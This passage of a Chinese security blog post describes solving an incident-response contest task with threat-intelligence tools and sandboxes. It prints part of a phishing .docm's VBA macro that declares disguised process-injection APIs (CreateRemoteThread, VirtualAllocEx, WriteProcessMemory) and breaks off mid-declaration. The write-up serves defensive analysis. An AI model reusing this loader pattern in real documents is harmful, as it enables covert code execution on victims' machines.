<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>OSCTI在比赛中的应用 | Polo&#39;s Blog</title>
  <meta name="description" content="什么是OSCTI开源网络威胁情报 (Open-Source Cyber Threat Intelligence,OSCTI)是详细描述针对某个组织网络安全威胁的数据。OSCTI可以是结构化、半结构化及非结构化数据，如STIX 2.0标准的结构化威胁情报、以XML&#x2F;JSON等数据形式体现的半结构化威胁情报以及论坛、博客中出现的非结构化威胁情报。 情报或威胁情报的定义是广泛的，任何对于目标的描述、关联">
<meta property="og:type" content="article">
<meta property="og:title" content="OSCTI在比赛中的应用">
<meta property="og:url" content="https://polosec.github.io/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/index.html">
<meta property="og:site_name" content="Polo&#39;s Blog">
<meta property="og:description" content="什么是OSCTI开源网络威胁情报 (Open-Source Cyber Threat Intelligence,OSCTI)是详细描述针对某个组织网络安全威胁的数据。OSCTI可以是结构化、半结构化及非结构化数据，如STIX 2.0标准的结构化威胁情报、以XML&#x2F;JSON等数据形式体现的半结构化威胁情报以及论坛、博客中出现的非结构化威胁情报。 情报或威胁情报的定义是广泛的，任何对于目标的描述、关联">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401171832498.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401171949582.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401172303794.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401172422571.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401172603439.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401172925216.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401173328728.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401173404587.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401190837811.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401191040627.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401191208208.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401191318090.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401191502258.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401191612479.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401193337435.png">
<meta property="og:image" content="http://cdn.polowong.top/image-20240401193346949.png">
<meta property="article:published_time" content="2024-05-05T07:07:18.000Z">
<meta property="article:modified_time" content="2024-05-05T07:07:45.502Z">
<meta property="article:author" content="Polo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://cdn.polowong.top/image-20240401171832498.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://polosec.github.io/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Polo&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
    <link href="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.3.5/dist/jquery.fancybox.min.css" rel="stylesheet">
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/polosec" target="_blank">
          <img class="img-circle img-rotate" src="http://cdn.polowong.top/1.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">Polo</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">CTFer&amp;Cybersec Researcher</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Beijing, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/polosec" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>null</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/git/">git</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%9F%BA%E7%A1%80/">web基础</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/wp/">wp</a><span class="category-list-count">5</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/0307xctf/" rel="tag">0307xctf</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/awd/" rel="tag">awd</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/buu/" rel="tag">buu</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/buuoj/" rel="tag">buuoj</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/c/" rel="tag">c++</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/c%E8%AF%AD%E8%A8%80/" rel="tag">c语言</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/forensic/" rel="tag">forensic</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/git/" rel="tag">git</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/linux/" rel="tag">linux</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/meiyacup/" rel="tag">meiyacup</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/mysql/" rel="tag">mysql</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/rdg/" rel="tag">rdg</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">29</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%8D%E6%9D%80/" rel="tag">免杀</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%96%E8%AF%81/" rel="tag">取证</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" rel="tag">密码学</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9D%82%E9%A1%B9/" rel="tag">杂项</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" rel="tag">流量分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BA%A2%E9%98%9F%E6%8A%80%E8%83%BD/" rel="tag">红队技能</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C/" rel="tag">网络</a><span class="tag-list-count">2</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/0307xctf/" style="font-size: 13.33px;">0307xctf</a> <a href="/tags/awd/" style="font-size: 13.5px;">awd</a> <a href="/tags/buu/" style="font-size: 13.5px;">buu</a> <a href="/tags/buuoj/" style="font-size: 13.5px;">buuoj</a> <a href="/tags/c/" style="font-size: 13px;">c++</a> <a href="/tags/ctf/" style="font-size: 13px;">ctf</a> <a href="/tags/c%E8%AF%AD%E8%A8%80/" style="font-size: 13px;">c语言</a> <a href="/tags/forensic/" style="font-size: 13px;">forensic</a> <a href="/tags/git/" style="font-size: 13px;">git</a> <a href="/tags/linux/" style="font-size: 13.17px;">linux</a> <a href="/tags/meiyacup/" style="font-size: 13px;">meiyacup</a> <a href="/tags/misc/" style="font-size: 13.83px;">misc</a> <a href="/tags/mysql/" style="font-size: 13.17px;">mysql</a> <a href="/tags/php/" style="font-size: 13.67px;">php</a> <a href="/tags/rdg/" style="font-size: 13.33px;">rdg</a> <a href="/tags/web/" style="font-size: 14px;">web</a> <a href="/tags/%E5%85%8D%E6%9D%80/" style="font-size: 13px;">免杀</a> <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 13.17px;">内网渗透</a> <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 13px;">反序列化</a> <a href="/tags/%E5%8F%96%E8%AF%81/" style="font-size: 13px;">取证</a> <a href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" style="font-size: 13.17px;">密码学</a> <a href="/tags/%E6%9D%82%E9%A1%B9/" style="font-size: 13px;">杂项</a> <a href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" style="font-size: 13px;">流量分析</a> <a href="/tags/%E7%BA%A2%E9%98%9F%E6%8A%80%E8%83%BD/" style="font-size: 13px;">红队技能</a> <a href="/tags/%E7%BD%91%E7%BB%9C/" style="font-size: 13.17px;">网络</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/05/">May 2024</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">July 2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">December 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">October 2021</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">May 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">April 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">March 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/02/">February 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a><span class="archive-list-count">6</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a><span class="archive-list-count">8</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">8</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">16</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/" class="title">OSCTI在比赛中的应用</a>
              </p>
              <p class="item-date">
                <time datetime="2024-05-05T07:07:18.000Z" itemprop="datePublished">2024-05-05</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/24/%E4%B8%AA/" class="title">跟WIZ学K8s安全与云安全--CTF挑战赛</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-24T07:30:18.000Z" itemprop="datePublished">2023-12-24</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/12/22/%E7%8E%84%E6%9C%BA-ER-01/" class="title">玄机应急响应靶场-redis-mysql-BT3-权限维持</a>
              </p>
              <p class="item-date">
                <time datetime="2023-12-22T13:02:39.000Z" itemprop="datePublished">2023-12-22</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2023/07/01/AWD%E4%B8%8D%E6%AD%BB%E9%A9%AC%E5%88%86%E6%9E%90/" class="title">AWD不死马分析</a>
              </p>
              <p class="item-date">
                <time datetime="2023-07-01T12:16:14.000Z" itemprop="datePublished">2023-07-01</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2022/11/14/%E5%9B%9B%E5%B7%9D%E7%9C%81%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%8A%80%E6%9C%AF%E5%A4%A7%E8%B5%9B-AWD%E9%83%A8%E5%88%86WriteUp/" class="title">四川省信息安全技术大赛 AWD部分WriteUp</a>
              </p>
              <p class="item-date">
                <time datetime="2022-11-14T13:52:55.000Z" itemprop="datePublished">2022-11-14</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-OSCTI在比赛中的应用" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      OSCTI在比赛中的应用
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/" class="article-date">
	  <time datetime="2024-05-05T07:07:18.000Z" itemprop="datePublished">2024-05-05</time>
	</a>
</span>
        
        

        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/#comments" class="article-comment-link">Comments</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">Word Count: 2.6k(words)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">Read Count: 13(minutes)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h2 id="什么是OSCTI"><a href="#什么是OSCTI" class="headerlink" title="什么是OSCTI"></a>什么是OSCTI</h2><p>开源网络威胁情报 (Open-Source Cyber Threat Intelligence,OSCTI)是详细描述针对某个组织网络安全威胁的数据。OSCTI可以是结构化、半结构化及非结构化数据，如STIX 2.0标准的结构化威胁情报、以XML/JSON等数据形式体现的半结构化威胁情报以及论坛、博客中出现的非结构化威胁情报。</p>
<p>情报或威胁情报的定义是广泛的，任何对于目标的描述、关联信息均可被定义为情报。在本文中，重点讨论应急响应过程中的OSCTI以及与OSCTI相关的组件，即样本IoC、在线沙箱等。</p>
<h2 id="场景重现"><a href="#场景重现" class="headerlink" title="场景重现"></a>场景重现</h2><p>在近期某次应急响应赛事中，对一台被钓鱼攻击的PC机进行分析，显式提供.docm文件一份，为C2 Stager下载器；隐藏提供exe文件一份，为C2 Stager。由于在赛时忽略了查看隐藏文件，遂未发现C2 Stager，仅发现.docm文件。</p>
<h3 id="Q1-攻击者C2-server-IP地址是多少"><a href="#Q1-攻击者C2-server-IP地址是多少" class="headerlink" title="Q1:攻击者C2 server IP地址是多少"></a>Q1:攻击者C2 server IP地址是多少</h3><h3 id="Q2-攻击者落地C2样本md5值是多少"><a href="#Q2-攻击者落地C2样本md5值是多少" class="headerlink" title="Q2:攻击者落地C2样本md5值是多少"></a>Q2:攻击者落地C2样本md5值是多少</h3><p>对于Q1，正常做法是使用tcpview/tcpdump/wireshark等工具查看主机网络连接，在受害主机运行样本时提交IP地址即可，或者将样本考出，于虚拟机中执行并观察网络连接状况。</p>
<p><img src="http://cdn.polowong.top/image-20240401171832498.png" alt="image-20240401171832498"></p>
<p><strong>图 tcpview查看网络连接示例</strong></p>
<p>对于Q2，发现隐藏的C2样本后，直接使用certutil计算MD5值即可。</p>
<p>然而，每次运行样本时，样本所连接的IP地址都不一样，交了三四次都不对。同时，由于赛时并未发现C2样本，导致Q2无法作答。</p>
<h2 id="巧用OSCTI解题"><a href="#巧用OSCTI解题" class="headerlink" title="巧用OSCTI解题"></a>巧用OSCTI解题</h2><p>虽然没有C2样本，但是xxx.docm文件是有的，于是将其上传至在线沙箱进行解析。</p>
<h3 id="微步云沙箱"><a href="#微步云沙箱" class="headerlink" title="微步云沙箱"></a>微步云沙箱</h3><p>赛时将xx.docm上传至微步沙箱尝试解析，使用默认配置 Windows10x64 bit可惜并未解析出网络行为,在字符串中并未发现相关特征</p>
<p><img src="http://cdn.polowong.top/image-20240401171949582.png" alt="image-20240401171949582"></p>
<p>xxx.docm宏代码如下:</p>
<figure class="highlight vb"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Private</span> Type PROCESS_INFORMATION</span><br><span class="line">    hProcess <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    hThread <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwProcessId <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwThreadId <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line"><span class="keyword">End</span> Type</span><br><span class="line"></span><br><span class="line"><span class="keyword">Private</span> Type STARTUPINFO</span><br><span class="line">    cb <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    lpReserved <span class="keyword">As</span> <span class="type">String</span></span><br><span class="line">    lpDesktop <span class="keyword">As</span> <span class="type">String</span></span><br><span class="line">    lpTitle <span class="keyword">As</span> <span class="type">String</span></span><br><span class="line">    dwX <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwY <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwXSize <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwYSize <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwXCountChars <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwYCountChars <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwFillAttribute <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    dwFlags <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    wShowWindow <span class="keyword">As</span> <span class="type">Integer</span></span><br><span class="line">    cbReserved2 <span class="keyword">As</span> <span class="type">Integer</span></span><br><span class="line">    lpReserved2 <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    hStdInput <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    hStdOutput <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line">    hStdError <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line"><span class="keyword">End</span> Type</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">If</span> VBA7 <span class="meta-keyword">Then</span></span></span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> PtrSafe <span class="keyword">Function</span> CreateStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;CreateRemoteThread&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpThreadAttributes <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwStackSize <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpStartAddress <span class="keyword">As</span> LongPtr, lpParameter <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwCreationFlags <span class="keyword">As</span> <span class="type">Long</span>, lpThreadID <span class="keyword">As</span> <span class="type">Long</span>) <span class="keyword">As</span> LongPtr</span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> PtrSafe <span class="keyword">Function</span> AllocStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;VirtualAllocEx&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lpAddr <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lSize <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> flAllocationType <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> flProtect <span class="keyword">As</span> <span class="type">Long</span>) <span class="keyword">As</span> LongPtr</span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> PtrSafe <span class="keyword">Function</span> WriteStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;WriteProcessMemory&quot;</span> (<span class="keyword">ByVal</span> hProcess <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> lDest <span class="keyword">As</span> LongPtr, <span class="keyword">ByRef</span> Source <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> Length <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> LengthWrote <span class="keyword">As</span> LongPtr) <span class="keyword">As</span> LongPtr</span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> PtrSafe <span class="keyword">Function</span> RunStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span class="string">&quot;CreateProcessA&quot;</span> (<span class="keyword">ByVal</span> lpApplicationName <span class="keyword">As</span> <span class="type">String</span>, <span class="keyword">ByVal</span> lpCommandLine <span class="keyword">As</span> <span class="type">String</span>, lpProcessAttributes <span class="keyword">As</span> Any, lpThreadAttributes <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> bInheritHandles <span class="keyword">As</span> <span class="type">Long</span>, <span class="keyword">ByVal</span> dwCreationFlags <span class="keyword">As</span> <span class="type">Long</span>, lpEnvironment <span class="keyword">As</span> Any, <span class="keyword">ByVal</span> lpCurrentDirectory <span class="keyword">As</span> <span class="type">String</span>, lpStartupInfo <span class="keyword">As</span> STARTUPINFO, lpProcessInformation <span class="keyword">As</span> PROCESS_INFORMATION) <span class="keyword">As</span> <span class="type">Long</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">Else</span></span></span><br><span class="line">    <span class="keyword">Private</span> <span class="keyword">Declare</span> <span class="keyword">Function</span> CreateStuff <span class="keyword">Lib</span> <span class="string">&quot;kernel32&quot;</span> <span class="keyword">Alias</span> <span 